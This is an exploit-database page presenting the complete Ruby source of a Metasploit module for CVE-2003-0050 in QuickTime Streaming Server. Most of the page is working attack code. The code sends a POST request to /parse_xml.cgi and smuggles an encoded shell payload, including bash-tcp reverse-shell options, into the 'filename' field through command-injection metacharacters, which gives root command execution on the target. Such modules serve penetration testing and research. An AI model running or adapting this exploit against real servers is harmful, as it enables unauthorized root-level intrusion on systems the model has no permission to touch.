QuickTime Streaming Server parse_xml.cgi Remote Execution

2009-12-09T13:23:59
ID MSF:EXPLOIT/UNIX/WEBAPP/QTSS_PARSE_XML_EXEC
Type metasploit
Reporter Rapid7
Modified 2017-07-24T13:26:21

Description

The QuickTime Streaming Server contains a CGI script that is vulnerable to metacharacter injection, allow arbitrary commands to be executed as root.

                                        
                                            ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'QuickTime Streaming Server parse_xml.cgi Remote Execution',
      'Description'    => %q{
          The QuickTime Streaming Server contains a CGI script that is vulnerable
        to metacharacter injection, allow arbitrary commands to be executed as root.
        },
      'Author'         => [ 'hdm' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '10562'],
          [ 'BID', '6954' ],
          [ 'CVE', '2003-0050' ]
        ],
      'Privileged'     => true,
      'Payload'        =>
        {
          'DisableNops' => true,
          'Space'       => 512,
          'Compat'      =>
            {
              'PayloadType' => 'cmd cmd_bash',
              'RequiredCmd' => 'generic perl bash-tcp telnet',
            }
        },
      'Platform'       => 'unix',
      'Arch'           => ARCH_CMD,
      'Targets'        => [[ 'Automatic', { }]],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Feb 24 2003'
    ))

    register_options(
      [
        Opt::RPORT(1220)
      ])
  end

  def exploit

    print_status("Sending post request with embedded command...")

    data = "filename=" + Rex::Text.uri_encode(";#{payload.encoded}|")

    response = send_request_raw({
      'uri'	  => "/parse_xml.cgi",
      'method'  => 'POST',
      'data'    => data,
      'headers' =>
      {
        'Content-Type'	 => 'application/x-www-form-urlencoded',
        'Content-Length' => data.length,
      }
    }, 3)

    # If the upload worked, the server tries to redirect us to some info
    # about the file we just saved
    if response and response.code != 200
      print_error("Server returned non-200 status code (#{response.code})")
    end

    handler
  end
end